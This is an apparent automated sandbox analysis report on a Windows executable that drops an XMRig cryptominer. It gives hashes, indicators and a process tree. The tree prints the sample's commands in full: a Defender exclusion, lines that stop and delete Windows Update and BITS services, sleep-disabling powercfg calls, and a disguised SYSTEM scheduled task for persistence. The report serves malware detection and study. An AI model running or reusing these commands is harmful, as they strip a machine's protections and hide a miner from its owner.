Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
10-03-2023 12:23
Static task
static1
Behavioral task
behavioral1
Sample
e5714adf276ab96cff90d3778ba51b7e.exe
Resource
win7-20230220-en
General
-
Target
e5714adf276ab96cff90d3778ba51b7e.exe
-
Size
3.6MB
-
MD5
e5714adf276ab96cff90d3778ba51b7e
-
SHA1
5627bdf380aafe2b131c70e5c857739101a6fac3
-
SHA256
7687dc9e1f582c340a6ce1ffdc1db7b273608e635177f53b65f3cde51f7cf65c
-
SHA512
4dfd0f0e21c8a1865d6acaac6d66761a5b5c31a2fa0ca8960ad498a81930ff31579a56ee4e666b59b31f117e5d078305a1dd50d0a75cdc2a04733364425753c2
-
SSDEEP
98304:ee4H3qxuFh/zHgR7vjnOy3cQ0/r0UoEpQg9Kdaud4F:+vbg5Oy6/r0Uhd9Kdpd4F
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 1416 created 3136 1416 e5714adf276ab96cff90d3778ba51b7e.exe 39 PID 1416 created 3136 1416 e5714adf276ab96cff90d3778ba51b7e.exe 39 PID 1416 created 3136 1416 e5714adf276ab96cff90d3778ba51b7e.exe 39 PID 1416 created 3136 1416 e5714adf276ab96cff90d3778ba51b7e.exe 39 PID 1416 created 3136 1416 e5714adf276ab96cff90d3778ba51b7e.exe 39 PID 2452 created 3136 2452 updater.exe 39 PID 2452 created 3136 2452 updater.exe 39 PID 2452 created 3136 2452 updater.exe 39 PID 2452 created 3136 2452 updater.exe 39 PID 2452 created 3136 2452 updater.exe 39 PID 2452 created 3136 2452 updater.exe 39 PID 2452 created 3136 2452 updater.exe 39 -
XMRig Miner payload 13 IoCs
resource yara_rule behavioral2/memory/2160-250-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-254-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-255-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-257-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-260-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-263-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-265-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-267-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-269-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-271-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-273-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-275-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig behavioral2/memory/2160-281-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts e5714adf276ab96cff90d3778ba51b7e.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 2452 updater.exe -
resource yara_rule behavioral2/memory/2160-250-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-254-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-255-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-257-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-260-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-263-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-265-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-267-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-269-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-271-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-273-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-275-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx behavioral2/memory/2160-281-0x00007FF7FD050000-0x00007FF7FD844000-memory.dmp upx -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2452 set thread context of 4640 2452 updater.exe 143 PID 2452 set thread context of 2160 2452 updater.exe 150 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe e5714adf276ab96cff90d3778ba51b7e.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4668 sc.exe 3996 sc.exe 4516 sc.exe 3660 sc.exe 1572 sc.exe 3956 sc.exe 4192 sc.exe 3108 sc.exe 4328 sc.exe 528 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 1416 e5714adf276ab96cff90d3778ba51b7e.exe 1416 e5714adf276ab96cff90d3778ba51b7e.exe 388 powershell.exe 388 powershell.exe 1416 e5714adf276ab96cff90d3778ba51b7e.exe 1416 e5714adf276ab96cff90d3778ba51b7e.exe 1416 e5714adf276ab96cff90d3778ba51b7e.exe 1416 e5714adf276ab96cff90d3778ba51b7e.exe 1416 e5714adf276ab96cff90d3778ba51b7e.exe 1416 e5714adf276ab96cff90d3778ba51b7e.exe 1068 powershell.exe 1068 powershell.exe 1416 e5714adf276ab96cff90d3778ba51b7e.exe 1416 e5714adf276ab96cff90d3778ba51b7e.exe 1604 powershell.exe 1604 powershell.exe 2452 updater.exe 2452 updater.exe 1560 powershell.exe 1560 powershell.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 2828 powershell.exe 2828 powershell.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 2452 updater.exe 4640 conhost.exe 4640 conhost.exe 2452 updater.exe 2452 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 388 powershell.exe Token: SeShutdownPrivilege 1132 powercfg.exe Token: SeCreatePagefilePrivilege 1132 powercfg.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeShutdownPrivilege 3752 powercfg.exe Token: SeCreatePagefilePrivilege 3752 powercfg.exe Token: SeShutdownPrivilege 4952 powercfg.exe Token: SeCreatePagefilePrivilege 4952 powercfg.exe Token: SeShutdownPrivilege 4592 powercfg.exe Token: SeCreatePagefilePrivilege 4592 powercfg.exe Token: SeIncreaseQuotaPrivilege 1068 powershell.exe Token: SeSecurityPrivilege 1068 powershell.exe Token: SeTakeOwnershipPrivilege 1068 powershell.exe Token: SeLoadDriverPrivilege 1068 powershell.exe Token: SeSystemProfilePrivilege 1068 powershell.exe Token: SeSystemtimePrivilege 1068 powershell.exe Token: SeProfSingleProcessPrivilege 1068 powershell.exe Token: SeIncBasePriorityPrivilege 1068 powershell.exe Token: SeCreatePagefilePrivilege 1068 powershell.exe Token: SeBackupPrivilege 1068 powershell.exe Token: SeRestorePrivilege 1068 powershell.exe Token: SeShutdownPrivilege 1068 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeSystemEnvironmentPrivilege 1068 powershell.exe Token: SeRemoteShutdownPrivilege 1068 powershell.exe Token: SeUndockPrivilege 1068 powershell.exe Token: SeManageVolumePrivilege 1068 powershell.exe Token: 33 1068 powershell.exe Token: 34 1068 powershell.exe Token: 35 1068 powershell.exe Token: 36 1068 powershell.exe Token: SeIncreaseQuotaPrivilege 1068 powershell.exe Token: SeSecurityPrivilege 1068 powershell.exe Token: SeTakeOwnershipPrivilege 1068 powershell.exe Token: SeLoadDriverPrivilege 1068 powershell.exe Token: SeSystemProfilePrivilege 1068 powershell.exe Token: SeSystemtimePrivilege 1068 powershell.exe Token: SeProfSingleProcessPrivilege 1068 powershell.exe Token: SeIncBasePriorityPrivilege 1068 powershell.exe Token: SeCreatePagefilePrivilege 1068 powershell.exe Token: SeBackupPrivilege 1068 powershell.exe Token: SeRestorePrivilege 1068 powershell.exe Token: SeShutdownPrivilege 1068 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeSystemEnvironmentPrivilege 1068 powershell.exe Token: SeRemoteShutdownPrivilege 1068 powershell.exe Token: SeUndockPrivilege 1068 powershell.exe Token: SeManageVolumePrivilege 1068 powershell.exe Token: 33 1068 powershell.exe Token: 34 1068 powershell.exe Token: 35 1068 powershell.exe Token: 36 1068 powershell.exe Token: SeIncreaseQuotaPrivilege 1068 powershell.exe Token: SeSecurityPrivilege 1068 powershell.exe Token: SeTakeOwnershipPrivilege 1068 powershell.exe Token: SeLoadDriverPrivilege 1068 powershell.exe Token: SeSystemProfilePrivilege 1068 powershell.exe Token: SeSystemtimePrivilege 1068 powershell.exe Token: SeProfSingleProcessPrivilege 1068 powershell.exe Token: SeIncBasePriorityPrivilege 1068 powershell.exe Token: SeCreatePagefilePrivilege 1068 powershell.exe Token: SeBackupPrivilege 1068 powershell.exe Token: SeRestorePrivilege 1068 powershell.exe Token: SeShutdownPrivilege 1068 powershell.exe -
Suspicious use of WriteProcessMemory 62 IoCs
description pid Process procid_target PID 1328 wrote to memory of 1132 1328 cmd.exe 100 PID 1328 wrote to memory of 1132 1328 cmd.exe 100 PID 4384 wrote to memory of 1572 4384 cmd.exe 101 PID 4384 wrote to memory of 1572 4384 cmd.exe 101 PID 4384 wrote to memory of 528 4384 cmd.exe 103 PID 4384 wrote to memory of 528 4384 cmd.exe 103 PID 1328 wrote to memory of 3752 1328 cmd.exe 102 PID 1328 wrote to memory of 3752 1328 cmd.exe 102 PID 4384 wrote to memory of 3956 4384 cmd.exe 104 PID 4384 wrote to memory of 3956 4384 cmd.exe 104 PID 1328 wrote to memory of 4952 1328 cmd.exe 105 PID 1328 wrote to memory of 4952 1328 cmd.exe 105 PID 4384 wrote to memory of 4192 4384 cmd.exe 106 PID 4384 wrote to memory of 4192 4384 cmd.exe 106 PID 1328 wrote to memory of 4592 1328 cmd.exe 107 PID 1328 wrote to memory of 4592 1328 cmd.exe 107 PID 4384 wrote to memory of 4668 4384 cmd.exe 108 PID 4384 wrote to memory of 4668 4384 cmd.exe 108 PID 4384 wrote to memory of 4272 4384 cmd.exe 109 PID 4384 wrote to memory of 4272 4384 cmd.exe 109 PID 4384 wrote to memory of 2616 4384 cmd.exe 110 PID 4384 wrote to memory of 2616 4384 cmd.exe 110 PID 4384 wrote to memory of 2752 4384 cmd.exe 111 PID 4384 wrote to memory of 2752 4384 cmd.exe 111 PID 4384 wrote to memory of 4484 4384 cmd.exe 112 PID 4384 wrote to memory of 4484 4384 cmd.exe 112 PID 4384 wrote to memory of 1324 4384 cmd.exe 113 PID 4384 wrote to memory of 1324 4384 cmd.exe 113 PID 1604 wrote to memory of 2228 1604 powershell.exe 116 PID 1604 wrote to memory of 2228 1604 powershell.exe 116 PID 3908 wrote to memory of 3996 3908 cmd.exe 127 PID 3908 wrote to memory of 3996 3908 cmd.exe 127 PID 2564 wrote to memory of 3484 2564 cmd.exe 128 PID 2564 wrote to memory of 3484 2564 cmd.exe 128 PID 3908 wrote to memory of 3108 3908 cmd.exe 129 PID 3908 wrote to memory of 3108 3908 cmd.exe 129 PID 3908 wrote to memory of 4328 3908 cmd.exe 130 PID 3908 wrote to memory of 4328 3908 cmd.exe 130 PID 2564 wrote to memory of 4280 2564 cmd.exe 131 PID 2564 wrote to memory of 4280 2564 cmd.exe 131 PID 3908 wrote to memory of 4516 3908 cmd.exe 132 PID 3908 wrote to memory of 4516 3908 cmd.exe 132 PID 3908 wrote to memory of 3660 3908 cmd.exe 133 PID 3908 wrote to memory of 3660 3908 cmd.exe 133 PID 3908 wrote to memory of 3236 3908 cmd.exe 134 PID 3908 wrote to memory of 3236 3908 cmd.exe 134 PID 2564 wrote to memory of 4448 2564 cmd.exe 135 PID 2564 wrote to memory of 4448 2564 cmd.exe 135 PID 3908 wrote to memory of 3592 3908 cmd.exe 136 PID 3908 wrote to memory of 3592 3908 cmd.exe 136 PID 3908 wrote to memory of 4592 3908 cmd.exe 137 PID 3908 wrote to memory of 4592 3908 cmd.exe 137 PID 3908 wrote to memory of 4676 3908 cmd.exe 138 PID 3908 wrote to memory of 4676 3908 cmd.exe 138 PID 2564 wrote to memory of 2800 2564 cmd.exe 139 PID 2564 wrote to memory of 2800 2564 cmd.exe 139 PID 3908 wrote to memory of 1748 3908 cmd.exe 140 PID 3908 wrote to memory of 1748 3908 cmd.exe 140 PID 2452 wrote to memory of 4640 2452 updater.exe 143 PID 812 wrote to memory of 1364 812 cmd.exe 148 PID 812 wrote to memory of 1364 812 cmd.exe 148 PID 2452 wrote to memory of 2160 2452 updater.exe 150 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3136
-
C:\Users\Admin\AppData\Local\Temp\e5714adf276ab96cff90d3778ba51b7e.exe"C:\Users\Admin\AppData\Local\Temp\e5714adf276ab96cff90d3778ba51b7e.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:388
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1572
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:528
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3956
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4192
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4668
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4272
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2616
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2752
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4484
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1324
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xpzzfzp#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tfnducb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2228
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1560
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3996
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3108
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4328
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4516
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3660
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:3236
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:3592
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:4592
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4676
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1748
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3484
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4280
-
-
